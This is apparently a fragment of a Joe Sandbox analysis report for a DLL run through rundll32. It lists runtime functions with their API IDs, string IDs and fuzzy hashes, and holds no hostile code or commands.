                                                                                                                                                                                                                                                                      • Instruction ID: 0e08bba11ac0ad9f6f6124514d17085406b5fd0418ae2fa010a6a0cc5cd50d11
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C31A031711E0581EBA39B16984039D63A4BB4CBE4F5D8A25BF2A437D5EF38CA498308
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1666949209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                                                                      • Instruction ID: de2e915fae306b5b51e8ed7498582b349e8bb643afe958a96c2b02e58ec33d63
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D17976609B8882DAB1DB0AE49439A77A0F39CBC5F108216FACD477A5CF7DC655CB00
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: {for
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-864106941
                                                                                                                                                                                                                                                                      • Opcode ID: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                                                                      • Instruction ID: 495a72a0baf00997086ff0ea6129483d1001404d3758be8f7ad89a7954a2554b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9513A72605B88A9FB92DF68D4803EC77A1E349788F84D015FA485BB99DF78C799C340
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::
                                                                                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                                                                                      • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                                                                      • Opcode ID: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                                      • Instruction ID: 034e1c8f7962a666fb3fc1dfd84da393ef72e1dbc0cb733e50f71f00acf91dbc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B331C372604F8C85EBA2DF25A8503EA6351B74EBC5F54C216FA9A4B791DF2CC3498340
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9F1
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9FF
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA29
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA97
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FAA3
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                                      • Instruction ID: e8c6680ccd9c6dd87d65be781d57c711bd3b5d14812437631edbc0f748074d2d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF318071312B4891EEA7DB12A8007E63394BB4DBE0F598635BD1D4BB95EF3CC6499301
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                                      • API String ID: 1405650943-2211150622
                                                                                                                                                                                                                                                                      • Opcode ID: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                                      • Instruction ID: 1562cc7920372f8d96896f4d2247b54c2eb0bb003fb5d717fc29c8b40e6cc5f0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA415FB6605F8898FBA28B68D8413EC77A0B30D788F54C415EA4817794DF79C749C711
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                                                                      • Opcode ID: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                                      • Instruction ID: 33d68ee0dd99e5be83c02a107bf8deb86d92894b08a7c1c4eda6edb91acda212
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71316876614B58C8FB968F68E8513EC37B1B34D789F54C115EA885BBA8DF38C648C740
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                                                                      • Instruction ID: b4b3ab6b1088bd05896873025a869169f262880e2f39a8d17b8af41b45206a1e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6218231601A4881FAA6CB16A9057A973A4BB4CBF0F5C8735FE2D47BD1EF38C6499300
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                                                                      • Instruction ID: 16723c8e79fef191a1def12aff24d5b2aa2a9400166a0adaba498011b7871d09
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36217531311E4481EEA6CB16A8407992294BF4CBF4F59CB21FE2A577D5DF38C64A9304
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                                                                      • Instruction ID: 2907248bf1d03caf4a9efb5c727e6e4733018bdc7bf12693e50b486c0c56baec
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3521D332311F5881EAA6DB1698403A92390FB4DFE4F198725EF2A437D0DF38C60A8344
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                      • Opcode ID: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                                                                      • Instruction ID: d1b00c180fb1e660eff0b05203a4b174045681b8f2dca1d24339f74a07491a67
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56219F30704E0C45FAD7632155953FD1292BF4C7F9F1ACB18B836076C6EE288B095389
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 168861036-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 0000000180041917
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004194D
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004197A
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004198B
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004199C
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 00000001800419B7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-757766384
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::
                                                                                                                                                                                                                                                                      • String ID: `template-parameter$void
                                                                                                                                                                                                                                                                      • API String ID: 1333004437-4057429177
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                      • Opcode ID: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                                                                      • Instruction ID: c7829849b2f168159db765faf0b81d1f3368c8563c0f8ad31c6079f03d2a3549
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24F06271211B0881EBA28B24E8443BB6360AB4D7E1F648725FA69463E4CF6EC24D8700
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                                                                                      • Opcode ID: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                                                                      • Instruction ID: 3c6318098b6a105b45b44d24200d3ea19cec9be78bcf65ec60f6a028176840a5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2602CB32619B8486E7A1CB55E4947AAB7B0F3D8794F108016FACE47BA9DF7DC548CB00
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                      • Opcode ID: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                                      • Instruction ID: 135fc376b1a8cfedf6fd7dae04e6b903f416e55d44e7b02af783c7e71b4be7be
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26B19332216A4881EAE7DB559480BFD77A0EB5CBC4F09C426BE4A47785DF38C74AC742
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::$Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 826178784-0
                                                                                                                                                                                                                                                                      • Opcode ID: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                                      • Instruction ID: dc3e5c478041bf289d860fee317c83415d36c744b4e48cd64d64fa13d1e4a70b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77416B36201E58D8EB92CB61E8903EC37B4B719BC5FA48016EAA95B395DF75C759C300
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 00000001800419EF
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A0E
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A36
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A47
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A58
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                      APIs
